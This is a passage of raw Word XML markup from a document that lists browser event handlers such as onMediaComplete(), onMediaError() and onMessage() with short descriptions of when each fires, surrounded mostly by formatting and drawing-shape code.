        <w:t>string</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="10"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>after</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="10"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>the</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="10"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>window</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="10"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>loads)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00AC7743" w:rsidRDefault="00AC7743">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="16"/>
        </w:rPr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161"/>
        <w:ind w:left="420" w:hanging="231"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:sz w:val="16"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00AC7743" w:rsidRDefault="00EF5896">
      <w:pPr>
        <w:pStyle w:val="GvdeMetni"/>
        <w:spacing w:before="161"/>
        <w:ind w:left="190"/>
      </w:pPr>
      <w:r>
        <w:br w:type="column"/>
      </w:r>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>(can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exploited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the</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00AC7743" w:rsidRDefault="00EF5896">
      <w:pPr>
        <w:pStyle w:val="GvdeMetni"/>
        <w:spacing w:before="161"/>
        <w:ind w:left="190"/>
      </w:pPr>
      <w:r>
        <w:br w:type="column"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:w w:val="105"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>method)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num="3" w:space="708" w:equalWidth="0">
            <w:col w:w="460" w:space="1191"/>
            <w:col w:w="1973" w:space="1272"/>
            <w:col w:w="4124"/>
          </w:cols>
        </w:sect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ind w:left="420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160"/>
        <w:ind w:left="421" w:hanging="231"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:sz w:val="16"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00AC7743" w:rsidRDefault="00AC7743">
      <w:pPr>
        <w:pStyle w:val="GvdeMetni"/>
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00AC7743" w:rsidRDefault="00AC7743">
      <w:pPr>
        <w:pStyle w:val="GvdeMetni"/>
        <w:spacing w:before="7"/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0"/>
        <w:ind w:left="420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161"/>
        <w:ind w:left="421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ind w:left="420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160"/>
        <w:ind w:left="421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ind w:left="421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161"/>
        <w:ind w:left="421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ind w:left="421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160"/>
        <w:ind w:left="421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ind w:left="421" w:hanging="231"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:sz w:val="16"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00AC7743" w:rsidRDefault="00EF5896">
      <w:pPr>
        <w:pStyle w:val="GvdeMetni"/>
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:br w:type="column"/>
      </w:r>
    </w:p>
    <w:p w:rsidR="00AC7743" w:rsidRDefault="00AC7743">
      <w:pPr>
        <w:pStyle w:val="GvdeMetni"/>
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00AC7743" w:rsidRDefault="00AC7743">
      <w:pPr>
        <w:pStyle w:val="GvdeMetni"/>
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00AC7743" w:rsidRDefault="00EF5896">
      <w:pPr>
        <w:pStyle w:val="GvdeMetni"/>
        <w:spacing w:before="119"/>
        <w:ind w:left="4"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:w w:val="105"/>
        </w:rPr>
        <w:t>problem)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00AC7743" w:rsidRDefault="00EF5896">
      <w:pPr>
        <w:pStyle w:val="GvdeMetni"/>
        <w:spacing w:before="148" w:line="439" w:lineRule="auto"/>
        <w:ind w:left="443" w:right="302" w:firstLine="252"/>
      </w:pPr>
      <w:r>
        <w:br w:type="column"/>
      </w:r>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>(When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streaming</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="7"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>media</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="6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used,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event</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="7"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>could</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="7"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>fire</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="6"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>before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starts</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="6"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>playing)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="1"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>(User</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="5"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>opens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browser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contains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media</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="6"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>file,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event</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="6"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>fires</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="5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</w:p>
    <w:p w:rsidR="00AC7743" w:rsidRDefault="00AC7743">
      <w:pPr>
        <w:pStyle w:val="GvdeMetni"/>
        <w:spacing w:before="4"/>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00AC7743" w:rsidRDefault="00EF5896">
      <w:pPr>
        <w:pStyle w:val="GvdeMetni"/>
        <w:spacing w:before="1"/>
        <w:ind w:left="19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69907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-605155</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="949325" cy="116205"/>
                <wp:effectExtent l="0" t="0" r="0" b="0"/>
                <wp:wrapNone/>
                <wp:docPr id="997" name="Group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9325" cy="116205"/>
                          <a:chOff x="1930" y="-953"/>
                          <a:chExt cx="1495" cy="183"/>
                        </a:xfrm>
                      </wpg:grpSpPr>
                      <wps:wsp>
                        <wps:cNvPr id="998" name="Freeform 1000"/>
                        <wps:cNvSpPr>
                          <a:spLocks/>
                        </wps:cNvSpPr>
                        <wps:spPr bwMode="auto">
                          <a:xfrm>
                            <a:off x="1930" y="-953"/>
                            <a:ext cx="1495" cy="183"/>
                          </a:xfrm>
                          <a:custGeom>
                            <a:avLst/>
                            <a:gdLst>
                              <a:gd name="T0" fmla="+- 0 3404 1930"/>
                              <a:gd name="T1" fmla="*/ T0 w 1495"/>
                              <a:gd name="T2" fmla="+- 0 -770 -953"/>
                              <a:gd name="T3" fmla="*/ -770 h 183"/>
                              <a:gd name="T4" fmla="+- 0 1951 1930"/>
                              <a:gd name="T5" fmla="*/ T4 w 1495"/>
                              <a:gd name="T6" fmla="+- 0 -770 -953"/>
                              <a:gd name="T7" fmla="*/ -770 h 183"/>
                              <a:gd name="T8" fmla="+- 0 1948 1930"/>
                              <a:gd name="T9" fmla="*/ T8 w 1495"/>
                              <a:gd name="T10" fmla="+- 0 -771 -953"/>
                              <a:gd name="T11" fmla="*/ -771 h 183"/>
                              <a:gd name="T12" fmla="+- 0 1930 1930"/>
                              <a:gd name="T13" fmla="*/ T12 w 1495"/>
                              <a:gd name="T14" fmla="+- 0 -791 -953"/>
                              <a:gd name="T15" fmla="*/ -791 h 183"/>
                              <a:gd name="T16" fmla="+- 0 1930 1930"/>
                              <a:gd name="T17" fmla="*/ T16 w 1495"/>
                              <a:gd name="T18" fmla="+- 0 -795 -953"/>
                              <a:gd name="T19" fmla="*/ -795 h 183"/>
                              <a:gd name="T20" fmla="+- 0 1930 1930"/>
                              <a:gd name="T21" fmla="*/ T20 w 1495"/>
                              <a:gd name="T22" fmla="+- 0 -932 -953"/>
                              <a:gd name="T23" fmla="*/ -932 h 183"/>
                              <a:gd name="T24" fmla="+- 0 1951 1930"/>
                              <a:gd name="T25" fmla="*/ T24 w 1495"/>
                              <a:gd name="T26" fmla="+- 0 -953 -953"/>
                              <a:gd name="T27" fmla="*/ -953 h 183"/>
                              <a:gd name="T28" fmla="+- 0 3404 1930"/>
                              <a:gd name="T29" fmla="*/ T28 w 1495"/>
                              <a:gd name="T30" fmla="+- 0 -953 -953"/>
                              <a:gd name="T31" fmla="*/ -953 h 183"/>
                              <a:gd name="T32" fmla="+- 0 3425 1930"/>
                              <a:gd name="T33" fmla="*/ T32 w 1495"/>
                              <a:gd name="T34" fmla="+- 0 -932 -953"/>
                              <a:gd name="T35" fmla="*/ -932 h 183"/>
                              <a:gd name="T36" fmla="+- 0 3425 1930"/>
                              <a:gd name="T37" fmla="*/ T36 w 1495"/>
                              <a:gd name="T38" fmla="+- 0 -791 -953"/>
                              <a:gd name="T39" fmla="*/ -791 h 183"/>
                              <a:gd name="T40" fmla="+- 0 3407 1930"/>
                              <a:gd name="T41" fmla="*/ T40 w 1495"/>
                              <a:gd name="T42" fmla="+- 0 -771 -953"/>
                              <a:gd name="T43" fmla="*/ -771 h 183"/>
                              <a:gd name="T44" fmla="+- 0 3404 1930"/>
                              <a:gd name="T45" fmla="*/ T44 w 1495"/>
                              <a:gd name="T46" fmla="+- 0 -770 -953"/>
                              <a:gd name="T47" fmla="*/ -77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95" h="183">
                                <a:moveTo>
                                  <a:pt x="1474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474" y="0"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="1495" y="21"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="1495" y="162"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="1477" y="182"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="1474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Text Box 99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-953"/>
                            <a:ext cx="149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onMediaComplete()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98" o:spid="_x0000_s1434" style="position:absolute;left:0;text-align:left;margin-left:96.5pt;margin-top:-47.65pt;width:74.75pt;height:9.15pt;z-index:-17617408;mso-position-horizontal-relative:page;mso-position-vertical-relative:text" coordorigin="1930,-953" coordsize="149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">
                <v:shape id="Freeform 1000" o:spid="_x0000_s1435" style="position:absolute;left:1930;top:-953;width:1495;height:183;visibility:visible;mso-wrap-style:square;v-text-anchor:top" coordsize="149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HwsL8A&#10;AADcAAAADwAAAGRycy9kb3ducmV2LnhtbERPTYvCMBC9C/6HMIIX0dQuK7YaRQRxr6uC16EZm2Iz&#10;KU1su/vrzWFhj4/3vd0PthYdtb5yrGC5SEAQF05XXCq4XU/zNQgfkDXWjknBD3nY78ajLeba9fxN&#10;3SWUIoawz1GBCaHJpfSFIYt+4RriyD1cazFE2JZSt9jHcFvLNElW0mLFscFgQ0dDxfPysgpmn78f&#10;6aM7NYVBrpJe871Mz0pNJ8NhAyLQEP7Ff+4vrSDL4tp4Jh4BuX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QfCwvwAAANwAAAAPAAAAAAAAAAAAAAAAAJgCAABkcnMvZG93bnJl&#10;di54bWxQSwUGAAAAAAQABAD1AAAAhAMAAAAA&#10;" path="m1474,183l21,183r-3,-1l,162r,-4l,21,21,,1474,r21,21l1495,162r-18,20l1474,183xe" fillcolor="#f5f5f5" stroked="f">
                  <v:path arrowok="t" o:connecttype="custom" o:connectlocs="1474,-770;21,-770;18,-771;0,-791;0,-795;0,-932;21,-953;1474,-953;1495,-932;1495,-791;1477,-771;1474,-770" o:connectangles="0,0,0,0,0,0,0,0,0,0,0,0"/>
                </v:shape>
                <v:shape id="Text Box 999" o:spid="_x0000_s1436" type="#_x0000_t202" style="position:absolute;left:1930;top:-953;width:149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A0xsQA&#10;AADcAAAADwAAAGRycy9kb3ducmV2LnhtbESPQWvCQBSE7wX/w/IEb83GHqSJriJiQRBKYzx4fGaf&#10;yWL2bcyumv77bqHQ4zAz3zCL1WBb8aDeG8cKpkkKgrhy2nCt4Fh+vL6D8AFZY+uYFHyTh9Vy9LLA&#10;XLsnF/Q4hFpECPscFTQhdLmUvmrIok9cRxy9i+sthij7WuoenxFuW/mWpjNp0XBcaLCjTUPV9XC3&#10;CtYnLrbm9nn+Ki6FKcss5f3sqtRkPKznIAIN4T/8195pBVmWwe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wNMb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onMediaComplete()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01856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-381000</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="795020" cy="116205"/>
                <wp:effectExtent l="0" t="0" r="0" b="0"/>
                <wp:wrapNone/>
                <wp:docPr id="994" name="Group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5020" cy="116205"/>
                          <a:chOff x="1930" y="-600"/>
                          <a:chExt cx="1252" cy="183"/>
                        </a:xfrm>
                      </wpg:grpSpPr>
                      <wps:wsp>
                        <wps:cNvPr id="995" name="Freeform 997"/>
                        <wps:cNvSpPr>
                          <a:spLocks/>
                        </wps:cNvSpPr>
                        <wps:spPr bwMode="auto">
                          <a:xfrm>
                            <a:off x="1930" y="-601"/>
                            <a:ext cx="1252" cy="183"/>
                          </a:xfrm>
                          <a:custGeom>
                            <a:avLst/>
                            <a:gdLst>
                              <a:gd name="T0" fmla="+- 0 3161 1930"/>
                              <a:gd name="T1" fmla="*/ T0 w 1252"/>
                              <a:gd name="T2" fmla="+- 0 -418 -600"/>
                              <a:gd name="T3" fmla="*/ -418 h 183"/>
                              <a:gd name="T4" fmla="+- 0 1951 1930"/>
                              <a:gd name="T5" fmla="*/ T4 w 1252"/>
                              <a:gd name="T6" fmla="+- 0 -418 -600"/>
                              <a:gd name="T7" fmla="*/ -418 h 183"/>
                              <a:gd name="T8" fmla="+- 0 1948 1930"/>
                              <a:gd name="T9" fmla="*/ T8 w 1252"/>
                              <a:gd name="T10" fmla="+- 0 -419 -600"/>
                              <a:gd name="T11" fmla="*/ -419 h 183"/>
                              <a:gd name="T12" fmla="+- 0 1930 1930"/>
                              <a:gd name="T13" fmla="*/ T12 w 1252"/>
                              <a:gd name="T14" fmla="+- 0 -439 -600"/>
                              <a:gd name="T15" fmla="*/ -439 h 183"/>
                              <a:gd name="T16" fmla="+- 0 1930 1930"/>
                              <a:gd name="T17" fmla="*/ T16 w 1252"/>
                              <a:gd name="T18" fmla="+- 0 -442 -600"/>
                              <a:gd name="T19" fmla="*/ -442 h 183"/>
                              <a:gd name="T20" fmla="+- 0 1930 1930"/>
                              <a:gd name="T21" fmla="*/ T20 w 1252"/>
                              <a:gd name="T22" fmla="+- 0 -579 -600"/>
                              <a:gd name="T23" fmla="*/ -579 h 183"/>
                              <a:gd name="T24" fmla="+- 0 1951 1930"/>
                              <a:gd name="T25" fmla="*/ T24 w 1252"/>
                              <a:gd name="T26" fmla="+- 0 -600 -600"/>
                              <a:gd name="T27" fmla="*/ -600 h 183"/>
                              <a:gd name="T28" fmla="+- 0 3161 1930"/>
                              <a:gd name="T29" fmla="*/ T28 w 1252"/>
                              <a:gd name="T30" fmla="+- 0 -600 -600"/>
                              <a:gd name="T31" fmla="*/ -600 h 183"/>
                              <a:gd name="T32" fmla="+- 0 3182 1930"/>
                              <a:gd name="T33" fmla="*/ T32 w 1252"/>
                              <a:gd name="T34" fmla="+- 0 -579 -600"/>
                              <a:gd name="T35" fmla="*/ -579 h 183"/>
                              <a:gd name="T36" fmla="+- 0 3182 1930"/>
                              <a:gd name="T37" fmla="*/ T36 w 1252"/>
                              <a:gd name="T38" fmla="+- 0 -439 -600"/>
                              <a:gd name="T39" fmla="*/ -439 h 183"/>
                              <a:gd name="T40" fmla="+- 0 3164 1930"/>
                              <a:gd name="T41" fmla="*/ T40 w 1252"/>
                              <a:gd name="T42" fmla="+- 0 -419 -600"/>
                              <a:gd name="T43" fmla="*/ -419 h 183"/>
                              <a:gd name="T44" fmla="+- 0 3161 1930"/>
                              <a:gd name="T45" fmla="*/ T44 w 1252"/>
                              <a:gd name="T46" fmla="+- 0 -418 -600"/>
                              <a:gd name="T47" fmla="*/ -41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52" h="183">
                                <a:moveTo>
                                  <a:pt x="123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231" y="0"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="1252" y="21"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="1252" y="161"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="1234" y="181"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="123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Text Box 99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-601"/>
                            <a:ext cx="1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onMediaError()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95" o:spid="_x0000_s1437" style="position:absolute;left:0;text-align:left;margin-left:96.5pt;margin-top:-30pt;width:62.6pt;height:9.15pt;z-index:15801856;mso-position-horizontal-relative:page;mso-position-vertical-relative:text" coordorigin="1930,-600" coordsize="125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">
                <v:shape id="Freeform 997" o:spid="_x0000_s1438" style="position:absolute;left:1930;top:-601;width:1252;height:183;visibility:visible;mso-wrap-style:square;v-text-anchor:top" coordsize="125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vrMcMA&#10;AADcAAAADwAAAGRycy9kb3ducmV2LnhtbESPQYvCMBSE7wv+h/CEva2piqLVKCoI9iS6en82z7ba&#10;vNQmq/XfG0HY4zAz3zDTeWNKcafaFZYVdDsRCOLU6oIzBYff9c8IhPPIGkvLpOBJDuaz1tcUY20f&#10;vKP73mciQNjFqCD3voqldGlOBl3HVsTBO9vaoA+yzqSu8RHgppS9KBpKgwWHhRwrWuWUXvd/RkF/&#10;2BzdWp+3x1OyeRZLk3Rvl0Sp73azmIDw1Pj/8Ke90QrG4wG8z4Qj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vrMcMAAADcAAAADwAAAAAAAAAAAAAAAACYAgAAZHJzL2Rv&#10;d25yZXYueG1sUEsFBgAAAAAEAAQA9QAAAIgDAAAAAA==&#10;" path="m1231,182l21,182r-3,-1l,161r,-3l,21,21,,1231,r21,21l1252,161r-18,20l1231,182xe" fillcolor="#f5f5f5" stroked="f">
                  <v:path arrowok="t" o:connecttype="custom" o:connectlocs="1231,-418;21,-418;18,-419;0,-439;0,-442;0,-579;21,-600;1231,-600;1252,-579;1252,-439;1234,-419;1231,-418" o:connectangles="0,0,0,0,0,0,0,0,0,0,0,0"/>
                </v:shape>
                <v:shape id="Text Box 996" o:spid="_x0000_s1439" type="#_x0000_t202" style="position:absolute;left:1930;top:-601;width:125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+gtMUA&#10;AADcAAAADwAAAGRycy9kb3ducmV2LnhtbESPQWvCQBSE74X+h+UVeqsbewhN6kZELAiFYowHj6/Z&#10;l2Qx+zZmV03/vVso9DjMzDfMYjnZXlxp9MaxgvksAUFcO224VXCoPl7eQPiArLF3TAp+yMOyeHxY&#10;YK7djUu67kMrIoR9jgq6EIZcSl93ZNHP3EAcvcaNFkOUYyv1iLcIt718TZJUWjQcFzocaN1Rfdpf&#10;rILVkcuNOX9978qmNFWVJfyZnpR6fppW7yACTeE//NfeagVZlsLvmXgEZH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6C0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onMediaError()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02368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4445</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="633095" cy="116205"/>
                <wp:effectExtent l="0" t="0" r="0" b="0"/>
                <wp:wrapNone/>
                <wp:docPr id="991" name="Group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7"/>
                          <a:chExt cx="997" cy="183"/>
                        </a:xfrm>
                      </wpg:grpSpPr>
                      <wps:wsp>
                        <wps:cNvPr id="992" name="Freeform 994"/>
                        <wps:cNvSpPr>
                          <a:spLocks/>
                        </wps:cNvSpPr>
                        <wps:spPr bwMode="auto">
                          <a:xfrm>
                            <a:off x="1930" y="7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189 7"/>
                              <a:gd name="T3" fmla="*/ 189 h 183"/>
                              <a:gd name="T4" fmla="+- 0 1951 1930"/>
                              <a:gd name="T5" fmla="*/ T4 w 997"/>
                              <a:gd name="T6" fmla="+- 0 189 7"/>
                              <a:gd name="T7" fmla="*/ 189 h 183"/>
                              <a:gd name="T8" fmla="+- 0 1948 1930"/>
                              <a:gd name="T9" fmla="*/ T8 w 997"/>
                              <a:gd name="T10" fmla="+- 0 189 7"/>
                              <a:gd name="T11" fmla="*/ 189 h 183"/>
                              <a:gd name="T12" fmla="+- 0 1930 1930"/>
                              <a:gd name="T13" fmla="*/ T12 w 997"/>
                              <a:gd name="T14" fmla="+- 0 168 7"/>
                              <a:gd name="T15" fmla="*/ 168 h 183"/>
                              <a:gd name="T16" fmla="+- 0 1930 1930"/>
                              <a:gd name="T17" fmla="*/ T16 w 997"/>
                              <a:gd name="T18" fmla="+- 0 165 7"/>
                              <a:gd name="T19" fmla="*/ 165 h 183"/>
                              <a:gd name="T20" fmla="+- 0 1930 1930"/>
                              <a:gd name="T21" fmla="*/ T20 w 997"/>
                              <a:gd name="T22" fmla="+- 0 28 7"/>
                              <a:gd name="T23" fmla="*/ 28 h 183"/>
                              <a:gd name="T24" fmla="+- 0 1951 1930"/>
                              <a:gd name="T25" fmla="*/ T24 w 997"/>
                              <a:gd name="T26" fmla="+- 0 7 7"/>
                              <a:gd name="T27" fmla="*/ 7 h 183"/>
                              <a:gd name="T28" fmla="+- 0 2906 1930"/>
                              <a:gd name="T29" fmla="*/ T28 w 997"/>
                              <a:gd name="T30" fmla="+- 0 7 7"/>
                              <a:gd name="T31" fmla="*/ 7 h 183"/>
                              <a:gd name="T32" fmla="+- 0 2927 1930"/>
                              <a:gd name="T33" fmla="*/ T32 w 997"/>
                              <a:gd name="T34" fmla="+- 0 28 7"/>
                              <a:gd name="T35" fmla="*/ 28 h 183"/>
                              <a:gd name="T36" fmla="+- 0 2927 1930"/>
                              <a:gd name="T37" fmla="*/ T36 w 997"/>
                              <a:gd name="T38" fmla="+- 0 168 7"/>
                              <a:gd name="T39" fmla="*/ 168 h 183"/>
                              <a:gd name="T40" fmla="+- 0 2909 1930"/>
                              <a:gd name="T41" fmla="*/ T40 w 997"/>
                              <a:gd name="T42" fmla="+- 0 189 7"/>
                              <a:gd name="T43" fmla="*/ 189 h 183"/>
                              <a:gd name="T44" fmla="+- 0 2906 1930"/>
                              <a:gd name="T45" fmla="*/ T44 w 997"/>
                              <a:gd name="T46" fmla="+- 0 189 7"/>
                              <a:gd name="T47" fmla="*/ 1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Text Box 99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7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onMessage()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92" o:spid="_x0000_s1440" style="position:absolute;left:0;text-align:left;margin-left:96.5pt;margin-top:.35pt;width:49.85pt;height:9.15pt;z-index:15802368;mso-position-horizontal-relative:page;mso-position-vertical-relative:text" coordorigin="1930,7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">
                <v:shape id="Freeform 994" o:spid="_x0000_s1441" style="position:absolute;left:1930;top:7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HY6sUA&#10;AADcAAAADwAAAGRycy9kb3ducmV2LnhtbESPT4vCMBTE7wt+h/AEL6KpCsu2GkWUBQ+6sP65P5tn&#10;W2xeuk2q9dsbQdjjMDO/YWaL1pTiRrUrLCsYDSMQxKnVBWcKjofvwRcI55E1lpZJwYMcLOadjxkm&#10;2t75l257n4kAYZeggtz7KpHSpTkZdENbEQfvYmuDPsg6k7rGe4CbUo6j6FMaLDgs5FjRKqf0um+M&#10;gt1fLNfr8rrs/2wvjWvOp/NEj5TqddvlFISn1v+H3+2NVhDHY3id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8djqxQAAANwAAAAPAAAAAAAAAAAAAAAAAJgCAABkcnMv&#10;ZG93bnJldi54bWxQSwUGAAAAAAQABAD1AAAAigMAAAAA&#10;" path="m976,182r-955,l18,182,,161r,-3l,21,21,,976,r21,21l997,161r-18,21l976,182xe" fillcolor="#f5f5f5" stroked="f">
                  <v:path arrowok="t" o:connecttype="custom" o:connectlocs="976,189;21,189;18,189;0,168;0,165;0,28;21,7;976,7;997,28;997,168;979,189;976,189" o:connectangles="0,0,0,0,0,0,0,0,0,0,0,0"/>
                </v:shape>
                <v:shape id="Text Box 993" o:spid="_x0000_s1442" type="#_x0000_t202" style="position:absolute;left:1930;top:7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gDLMUA&#10;AADcAAAADwAAAGRycy9kb3ducmV2LnhtbESPQWvCQBSE7wX/w/IEb3VjBWmiq4i0UBCKMR48PrPP&#10;ZDH7Ns1uNf77rlDwOMzMN8xi1dtGXKnzxrGCyTgBQVw6bbhScCg+X99B+ICssXFMCu7kYbUcvCww&#10;0+7GOV33oRIRwj5DBXUIbSalL2uy6MeuJY7e2XUWQ5RdJXWHtwi3jXxLkpm0aDgu1NjSpqbysv+1&#10;CtZHzj/Mz/dpl59zUxRpwtvZRanRsF/PQQTqwzP83/7SCtJ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GAMs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onMessage()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(fire</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="10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document</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="10"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>received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message)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00AC7743" w:rsidRDefault="00EF5896">
      <w:pPr>
        <w:pStyle w:val="GvdeMetni"/>
        <w:spacing w:before="160" w:line="424" w:lineRule="auto"/>
        <w:ind w:left="443" w:right="2394" w:hanging="85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02880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741045" cy="116205"/>
                <wp:effectExtent l="0" t="0" r="0" b="0"/>
                <wp:wrapNone/>
                <wp:docPr id="988" name="Group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6205"/>
                          <a:chOff x="1930" y="166"/>
                          <a:chExt cx="1167" cy="183"/>
                        </a:xfrm>
                      </wpg:grpSpPr>
                      <wps:wsp>
                        <wps:cNvPr id="989" name="Freeform 991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1167" cy="183"/>
                          </a:xfrm>
                          <a:custGeom>
                            <a:avLst/>
                            <a:gdLst>
                              <a:gd name="T0" fmla="+- 0 3076 1930"/>
                              <a:gd name="T1" fmla="*/ T0 w 1167"/>
                              <a:gd name="T2" fmla="+- 0 348 166"/>
                              <a:gd name="T3" fmla="*/ 348 h 183"/>
                              <a:gd name="T4" fmla="+- 0 1951 1930"/>
                              <a:gd name="T5" fmla="*/ T4 w 1167"/>
                              <a:gd name="T6" fmla="+- 0 348 166"/>
                              <a:gd name="T7" fmla="*/ 348 h 183"/>
                              <a:gd name="T8" fmla="+- 0 1948 1930"/>
                              <a:gd name="T9" fmla="*/ T8 w 1167"/>
                              <a:gd name="T10" fmla="+- 0 348 166"/>
                              <a:gd name="T11" fmla="*/ 348 h 183"/>
                              <a:gd name="T12" fmla="+- 0 1930 1930"/>
                              <a:gd name="T13" fmla="*/ T12 w 1167"/>
                              <a:gd name="T14" fmla="+- 0 327 166"/>
                              <a:gd name="T15" fmla="*/ 327 h 183"/>
                              <a:gd name="T16" fmla="+- 0 1930 1930"/>
                              <a:gd name="T17" fmla="*/ T16 w 1167"/>
                              <a:gd name="T18" fmla="+- 0 324 166"/>
                              <a:gd name="T19" fmla="*/ 324 h 183"/>
                              <a:gd name="T20" fmla="+- 0 1930 1930"/>
                              <a:gd name="T21" fmla="*/ T20 w 1167"/>
                              <a:gd name="T22" fmla="+- 0 187 166"/>
                              <a:gd name="T23" fmla="*/ 187 h 183"/>
                              <a:gd name="T24" fmla="+- 0 1951 1930"/>
                              <a:gd name="T25" fmla="*/ T24 w 1167"/>
                              <a:gd name="T26" fmla="+- 0 166 166"/>
                              <a:gd name="T27" fmla="*/ 166 h 183"/>
                              <a:gd name="T28" fmla="+- 0 3076 1930"/>
                              <a:gd name="T29" fmla="*/ T28 w 1167"/>
                              <a:gd name="T30" fmla="+- 0 166 166"/>
                              <a:gd name="T31" fmla="*/ 166 h 183"/>
                              <a:gd name="T32" fmla="+- 0 3097 1930"/>
                              <a:gd name="T33" fmla="*/ T32 w 1167"/>
                              <a:gd name="T34" fmla="+- 0 187 166"/>
                              <a:gd name="T35" fmla="*/ 187 h 183"/>
                              <a:gd name="T36" fmla="+- 0 3097 1930"/>
                              <a:gd name="T37" fmla="*/ T36 w 1167"/>
                              <a:gd name="T38" fmla="+- 0 327 166"/>
                              <a:gd name="T39" fmla="*/ 327 h 183"/>
                              <a:gd name="T40" fmla="+- 0 3079 1930"/>
                              <a:gd name="T41" fmla="*/ T40 w 1167"/>
                              <a:gd name="T42" fmla="+- 0 348 166"/>
                              <a:gd name="T43" fmla="*/ 348 h 183"/>
                              <a:gd name="T44" fmla="+- 0 3076 1930"/>
                              <a:gd name="T45" fmla="*/ T44 w 1167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67" h="183">
                                <a:moveTo>
                                  <a:pt x="114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146" y="0"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="1167" y="21"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="1167" y="161"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="1149" y="182"/>
                                </a:lnTo>
                                <a:lnTo>
